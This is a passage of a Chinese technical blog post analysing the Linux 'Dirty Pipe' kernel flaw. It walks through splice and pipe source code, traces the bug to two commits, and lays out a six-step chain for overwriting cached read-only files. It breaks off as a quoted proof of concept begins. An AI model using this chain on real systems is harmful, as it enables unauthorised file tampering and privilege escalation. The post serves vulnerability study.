class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="built_in">put_page</span>(page);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>从 pipe 读写操作中我们可以得知，pipe bufs 存放的页面无非两种：</p><ol><li>直接引用其他不变页（例如文件缓存页），这样就无需进行数据复制操作</li><li>自己创建页，需要进行数据复制</li></ol><p>由 pipe 机制来保证存放在 pipe bufs 中的页数据，不会被 pipe 本身给覆写。同时<strong>注意只有在自己创建的页上，才能进行 Merge 操作</strong>。</p></blockquote><h3 id="6-do-splice-函数">6. do_splice 函数</h3><p>Linux 库函数 <code>splice</code> 的作用是，将某个 fd 的数据不经过用户层，直接拷贝进另一个 fd 中。其函数声明如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> _GNU_SOURCE         <span class="comment">/* See feature_test_macros(7) */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">ssize_t</span> <span class="title">splice</span><span class="params">(<span class="type">int</span> fd_in, <span class="type">loff_t</span> *off_in, <span class="type">int</span> fd_out, <span class="type">loff_t</span> *off_out, <span class="type">size_t</span> len, <span class="type">unsigned</span> <span class="type">int</span> flags)</span></span>;</span><br></pre></td></tr></table></figure><p>这里的 fd 只能有两种情况：pipe fd 或 file fd，因此在 do_splice 函数中，内核也会对 fd 的类型做特判，来执行不同的数据传递操作。</p><p>这里，我们只需关注 <strong>From-fd 为 file，To-fd 为 pipe</strong> ，即<strong>数据从文件传递至管道</strong>的情况：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Determine where to splice to/from.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">long</span> <span class="title">do_splice</span><span class="params">(<span class="keyword">struct</span> file *in, <span class="type">loff_t</span> __user *off_in,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="keyword">struct</span> file *out, <span class="type">loff_t</span> __user *off_out,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">size_t</span> len, <span class="type">unsigned</span> <span class="type">int</span> flags)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *ipipe;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *opipe;</span><br><span class="line">    <span class="type">loff_t</span> offset;</span><br><span class="line">    <span class="type">long</span> ret;</span><br><span class="line"></span><br><span class="line">    ipipe = <span class="built_in">get_pipe_info</span>(in);</span><br><span class="line">    opipe = <span class="built_in">get_pipe_info</span>(out);</span><br><span class="line">    ...;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 当数据从文件复制给管道时</span></span><br><span class="line">    <span class="keyword">if</span> (opipe) &#123;</span><br><span class="line">        ...</span><br><span class="line">        <span class="comment">// 等待 pipe 存在空闲空间</span></span><br><span class="line">        <span class="keyword">if</span> (out-&gt;f_flags &amp; O_NONBLOCK)</span><br><span class="line">            flags |= SPLICE_F_NONBLOCK;</span><br><span class="line"></span><br><span class="line">        <span class="built_in">pipe_lock</span>(opipe);</span><br><span class="line">        ret = <span class="built_in">wait_for_space</span>(opipe, flags);</span><br><span class="line">        <span class="comment">// 如果等到 pipe 存在空闲空间后</span></span><br><span class="line">        <span class="keyword">if</span> (!ret) &#123;</span><br><span class="line">            <span class="type">unsigned</span> <span class="type">int</span> p_space;</span><br><span class="line">             <span class="comment">// 获取待传递数据大小</span></span><br><span class="line">            <span class="comment">/* Don&#x27;t try to read more the pipe has space for. */</span></span><br><span class="line">            p_space = opipe-&gt;max_usage - <span class="built_in">pipe_occupancy</span>(opipe-&gt;head, opipe-&gt;tail);</span><br><span class="line">            len = <span class="built_in">min_t</span>(<span class="type">size_t</span>, len, p_space &lt;&lt; PAGE_SHIFT);</span><br><span class="line">            <span class="comment">// 执行真正的传递操作</span></span><br><span class="line">            ret = <span class="built_in">do_splice_to</span>(in, &amp;offset, opipe, len, flags);</span><br><span class="line">        &#125;</span><br><span class="line">        ...</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>而在 do_splice_to 函数中，内核会根据<strong>文件系统类型</strong>，来调用对应的 splice_read 函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Attempt to initiate a splice from a file to a pipe.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">long</span> <span class="title">do_splice_to</span><span class="params">(<span class="keyword">struct</span> file *in, <span class="type">loff_t</span> *ppos,</span></span></span><br><span class="line"><span class="params"><span class="function">             <span class="keyword">struct</span> pipe_inode_info *pipe, <span class="type">size_t</span> len,</span></span></span><br><span class="line"><span class="params"><span class="function">             <span class="type">unsigned</span> <span class="type">int</span> flags)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!(in-&gt;f_mode &amp; FMODE_READ)))</span><br><span class="line">        <span class="keyword">return</span> -EBADF;</span><br><span class="line"></span><br><span class="line">    ret = <span class="built_in">rw_verify_area</span>(READ, in, ppos, len);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(ret &lt; <span class="number">0</span>))</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(len &gt; MAX_RW_COUNT))</span><br><span class="line">        len = MAX_RW_COUNT;</span><br><span class="line">    <span class="comment">// 调用 splice_read 函数</span></span><br><span class="line">    <span class="keyword">if</span> (in-&gt;f_op-&gt;splice_read)</span><br><span class="line">        <span class="keyword">return</span> in-&gt;f_op-&gt;<span class="built_in">splice_read</span>(in, ppos, pipe, len, flags);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">default_file_splice_read</span>(in, ppos, pipe, len, flags);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>以 linux 中最常见的文件系统 ext4 为例，这是 ext4 文件系统中所设置的一些关键方法：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// fs/ext4/file.c</span></span><br><span class="line"><span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">file_operations</span> ext4_file_operations = &#123;</span><br><span class="line">    ...</span><br><span class="line">    .read_iter    = ext4_file_read_iter,</span><br><span class="line">    ...</span><br><span class="line">    .splice_read  = generic_file_splice_read,</span><br><span class="line">    ...</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>因此最终 do_splice_to 函数会调用到 generic_file_splice_read 函数来执行数据传递：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * generic_file_splice_read - splice data from file to a pipe</span></span><br><span class="line"><span class="comment"> * @in:      file to splice from</span></span><br><span class="line"><span class="comment"> * @ppos:    position in @in</span></span><br><span class="line"><span class="comment"> * @pipe:    pipe to splice to</span></span><br><span class="line"><span class="comment"> * @len:     number of bytes to splice</span></span><br><span class="line"><span class="comment"> * @flags:   splice modifier flags</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Description:</span></span><br><span class="line"><span class="comment"> *    Will read pages from given file and fill them into a pipe. Can be</span></span><br><span class="line"><span class="comment"> *    used as long as it has more or less sane -&gt;read_iter().</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">ssize_t</span> <span class="title">generic_file_splice_read</span><span class="params">(<span class="keyword">struct</span> file *in, <span class="type">loff_t</span> *ppos,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="keyword">struct</span> pipe_inode_info *pipe, <span class="type">size_t</span> len,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">unsigned</span> <span class="type">int</span> flags)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">iov_iter</span> to;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">kiocb</span> kiocb;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> i_head;</span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 根据 pipe 结构体，创建 iov_iter 结构</span></span><br><span class="line">    <span class="built_in">iov_iter_pipe</span>(&amp;to, READ, pipe, len);</span><br><span class="line">    i_head = to.head;</span><br><span class="line">    <span class="comment">// 创建 kiocb 结构</span></span><br><span class="line">    <span class="built_in">init_sync_kiocb</span>(&amp;kiocb, in);</span><br><span class="line">    kiocb.ki_pos = *ppos;</span><br><span class="line">    <span class="comment">// 调用 call_read_iter 执行实际的数据传输操作 ！！！</span></span><br><span class="line">    ret = <span class="built_in">call_read_iter</span>(in, &amp;kiocb, &amp;to);</span><br><span class="line">    <span class="comment">// 如果数据正常传输</span></span><br><span class="line">    <span class="keyword">if</span> (ret &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// 更新文件访问情况</span></span><br><span class="line">        *ppos = kiocb.ki_pos;</span><br><span class="line">        <span class="built_in">file_accessed</span>(in);</span><br><span class="line">    <span class="comment">// 如果数据传输失败</span></span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (ret &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        to.head = i_head;</span><br><span class="line">        to.iov_offset = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">iov_iter_advance</span>(&amp;to, <span class="number">0</span>); <span class="comment">/* to free what was emitted */</span></span><br><span class="line">        <span class="comment">/*</span></span><br><span class="line"><span class="comment">         * callers of -&gt;splice_read() expect -EAGAIN on</span></span><br><span class="line"><span class="comment">         * &quot;can&#x27;t put anything in there&quot;, rather than -EFAULT.</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="keyword">if</span> (ret == -EFAULT)</span><br><span class="line">            ret = -EAGAIN;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>从 generic_file_splice_read 函数的代码中可以看到，该函数最终会调用 call_read_iter 函数来做数据传递；而该函数又会调用特定于文件系统的 read_iter 函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">ssize_t</span> <span class="title">call_read_iter</span><span class="params">(<span class="keyword">struct</span> file *file, <span class="keyword">struct</span> kiocb *kio,</span></span></span><br><span class="line"><span class="params"><span class="function">                     <span class="keyword">struct</span> iov_iter *iter)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> file-&gt;f_op-&gt;<span class="built_in">read_iter</span>(kio, iter);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>从 <code>ext4_file_operations</code> 代码中可以得知，call_read_iter 函数调用到的是 ext4_file_read_iter 函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span> <span class="title">ext4_file_read_iter</span><span class="params">(<span class="keyword">struct</span> kiocb *iocb, <span class="keyword">struct</span> iov_iter *to)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *inode = <span class="built_in">file_inode</span>(iocb-&gt;ki_filp);</span><br><span class="line">    <span class="comment">// 一些简单的判断</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(<span class="built_in">ext4_forced_shutdown</span>(<span class="built_in">EXT4_SB</span>(inode-&gt;i_sb))))</span><br><span class="line">        <span class="keyword">return</span> -EIO;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">iov_iter_count</span>(to))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>; <span class="comment">/* skip atime */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> CONFIG_FS_DAX</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">IS_DAX</span>(inode))</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">ext4_dax_read_iter</span>(iocb, to);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    <span class="keyword">if</span> (iocb-&gt;ki_flags &amp; IOCB_DIRECT)</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">ext4_dio_read_iter</span>(iocb, to);</span><br><span class="line">    <span class="comment">// 没设置 O_DIRECT 的走这里</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">generic_file_read_iter</span>(iocb, to);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>然后该函数又调 <code>generic_file_read_iter</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * generic_file_read_iter - generic filesystem read routine</span></span><br><span class="line"><span class="comment"> * @iocb:    kernel I/O control block</span></span><br><span class="line"><span class="comment"> * @iter:    destination for the data read</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * This is the &quot;read_iter()&quot; routine for all filesystems</span></span><br><span class="line"><span class="comment"> * that can use the page cache directly.</span></span><br><span class="line"><span class="comment"> * Return:</span></span><br><span class="line"><span class="comment"> * * number of bytes copied, even for partial reads</span></span><br><span class="line"><span class="comment"> * * negative error code if nothing was read</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">ssize_t</span></span></span><br><span class="line"><span class="function"><span class="title">generic_file_read_iter</span><span class="params">(<span class="keyword">struct</span> kiocb *iocb, <span class="keyword">struct</span> iov_iter *iter)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">size_t</span> count = <span class="built_in">iov_iter_count</span>(iter);</span><br><span class="line">    <span class="type">ssize_t</span> retval = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!count)</span><br><span class="line">        <span class="keyword">goto</span> out; <span class="comment">/* skip atime */</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (iocb-&gt;ki_flags &amp; IOCB_DIRECT) &#123;</span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 继续调用</span></span><br><span class="line">    retval = <span class="built_in">generic_file_buffered_read</span>(iocb, iter, retval);</span><br><span class="line">out:</span><br><span class="line">    <span class="keyword">return</span> retval;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>接着又调 <code>generic_file_buffered_read</code>函数。该函数代码量太大了我就不贴了，只简单讲讲其大致功能：</p><ul><li>尝试在<strong>该文件已有的文件缓存映射表</strong>中查找先前已经映射的文件缓存页<ul><li>如果没文件缓存，则读取磁盘上的文件数据，创建新的文件缓存。</li><li>如果有文件缓存但是缓存过期了，则更新这个文件缓存</li></ul></li><li>到了这一步，此时是一定有文件缓存了。则调用 <strong>copy_page_to_iter</strong> 函数来将文件缓存页上的数据，拷贝进 pipe 中。</li></ul><p>这个函数正是我们先前所介绍过的，因此整个 splice 系统调用，就可以和 pipe 那里的未初始化漏洞串起来了。</p><h2 id="四、漏洞成因">四、漏洞成因</h2><p>这个漏洞并非一蹴而就，而是由两个 commit 的错误相互结合导致的：</p><ul><li><p><a href="https://github.com/torvalds/linux/commit/241699cd72a8489c9446ae3910ddd243e9b9061b">new iov_iter flavour: pipe-backed - linux commit 241699</a>：引入字段的未初始化漏洞。 <code>push_pipe</code> 和 <code>copy_page_to_iter_pipe</code> 两个函数在设置 <code>pipe_buffer</code> 结构体时均未初始化 flag 字段。</p></li><li><p><a href="https://github.com/torvalds/linux/commit/f6dd975583bd8ce088400648fd9819e4691c8958">pipe: merge anon_pipe_buf*_ops - linux commit f6dd97</a>：在该 commit 前，内核通过比较 <code>pipe_buf-&gt;ops</code> 的地址来判断两块 <code>pipe_buf</code> 是否是<strong>可合并</strong>的。<strong>这种编码并不优雅</strong>，因为无论是否可合并，<code>pipe_buf-&gt;ops</code> 实际指向的几个函数指针都是同一个：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// fs/pipe.c</span></span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">pipe_buf_operations</span> anon_pipe_buf_ops = &#123;</span><br><span class="line">  .confirm = generic_pipe_buf_confirm,</span><br><span class="line">  .release = anon_pipe_buf_release,</span><br><span class="line">  .steal = anon_pipe_buf_steal,</span><br><span class="line">  .get = generic_pipe_buf_get,</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">pipe_buf_operations</span> anon_pipe_buf_nomerge_ops = &#123;</span><br><span class="line">  .confirm = generic_pipe_buf_confirm,</span><br><span class="line">  .release = anon_pipe_buf_release,</span><br><span class="line">  .steal = anon_pipe_buf_steal,</span><br><span class="line">  .get = generic_pipe_buf_get,</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">pipe_buf_operations</span> packet_pipe_buf_ops = &#123;</span><br><span class="line">  .confirm = generic_pipe_buf_confirm,</span><br><span class="line">  .release = anon_pipe_buf_release,</span><br><span class="line">  .steal = anon_pipe_buf_steal,</span><br><span class="line">  .get = generic_pipe_buf_get,</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>可以看到，这么 tricky 的代码非常的不优雅，因此在该 commit(f6dd97) 中，linux 重构了这部分代码，启用了新的 pipe buf 标志：<code>PIPE_BUF_FLAG_CAN_MERGE</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// include/linux/pipe_fs_i.h</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_LRU       0x01  <span class="comment">/* page is on the LRU */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_ATOMIC    0x02  <span class="comment">/* was atomically mapped */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_GIFT      0x04  <span class="comment">/* page is a gift */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_PACKET    0x08  <span class="comment">/* read() as a packet */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_CAN_MERGE 0x10  <span class="comment">/* can merge buffers */</span>     <span class="comment">// &lt;= 新引入的 flag</span></span></span><br></pre></td></tr></table></figure><p>整个重构过程并没有问题，<strong>唯一带来的副作用就是引入了新的 pipe buf 标志：PIPE_BUF_FLAG_CAN_MERGE</strong>。</p></li></ul><p>尽管第一个 commit 引入了字段未初始化漏洞，但该漏洞仍然无法造成较大的影响，因为<strong>可选的几个 pipe buf flag 中没有什么是可用于利用的</strong>。但是当第二个 commit 引入了新的 pipe buf flag：<code>PIPE_BUF_FLAG_CAN_MERGE</code> 时，该字段未初始化漏洞就非常的致命了，因为新的 pipe_buf 可以通过未初始化漏洞，来重用旧的 flag，例如 <code>PIPE_BUF_FLAG_CAN_MERGE</code>，来<strong>打破 page buf 的完整性</strong>，使得<strong>允许对那些本不该写入的页进行写入</strong>（例如本不该带有 PIPE_BUF_FLAG_CAN_MERGE 标志的页，诸如文件缓存页等等）。</p><p>注意，这里说的<strong>只读页</strong>，在 pipe 中<strong>并非使用权限控制等技术来保证不写</strong>，而是<strong>通过 pipe 所实现的逻辑来保证</strong>。因此，当 pipe 实现的逻辑出现了问题，那么 pipe 就可以尝试写入只读页，进而达到任意文件写的目的。</p><h2 id="五、漏洞利用">五、漏洞利用</h2><p>通过上面的代码分析我们可以简单推断出这样的一条漏洞利用链：</p><ol><li><p>创建管道（<strong>务必不要</strong>带上 O_DIRECT）</p></li><li><p><strong>往管道中直接写入大量数据</strong>，使得 pipe 结构体中<strong>所有 page buf 的 flag 全部都设置了 PIPE_BUF_FLAG_CAN_MERGE 标志</strong>。</p></li><li><p><strong>从该管道中将数据全部读取出来</strong>，释放所有 page buf。</p></li><li><p>调用 splice，将<strong>数据长度不与页大小对齐</strong>的<strong>可读</strong>文件数据，传递至该管道中。这样在管道的 head 位置，势必会有一个 page buf，其中 <strong>page 指向文件缓存</strong>，<strong>flags 为 PIPE_BUF_FLAG_CAN_MERGE</strong>。</p><blockquote><p>因为 page buf 在重分配时不会初始化 flags，因此这里的 flags 将仍然保留为 PIPE_BUF_FLAG_CAN_MERGE。</p></blockquote></li><li><p>直接继续往该管道中写入<strong>目标数据</strong>，这样由于 PIPE_BUF_FLAG_CAN_MERGE 标志仍然存在，新写入的数据将会<strong>直接与 page buf 所指向的文件缓存合并</strong>。</p></li><li><p>此时访问该文件，则<strong>内核会将被修改后的文件缓存中的数据返回</strong>，这样便可达到在内核层面任意文件写的目的。</p></li></ol><blockquote><p>需要注意的是，通过漏洞来“意外”修改文件缓存，<strong>不会使该文件缓存重新写回磁盘上</strong>。只有当内核的其他模块<strong>主动改写</strong>了这块文件缓存，使得该文件缓存<strong>变脏（dirty）</strong>，这样才会把被修改后的文件缓存保存回磁盘上。</p><p>内核判断一个文件缓存是否 dirty，并非判断上面的数据有无被改写，而是判断其 dirty 标志。通过 dirty pipe 漏洞来改写文件缓存并不会影响到上面的 dirty 标志。</p></blockquote><p>介于 cm4all 那边已经给出了非常清晰易懂的 POC，因此这里直接贴出它的 POC：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span 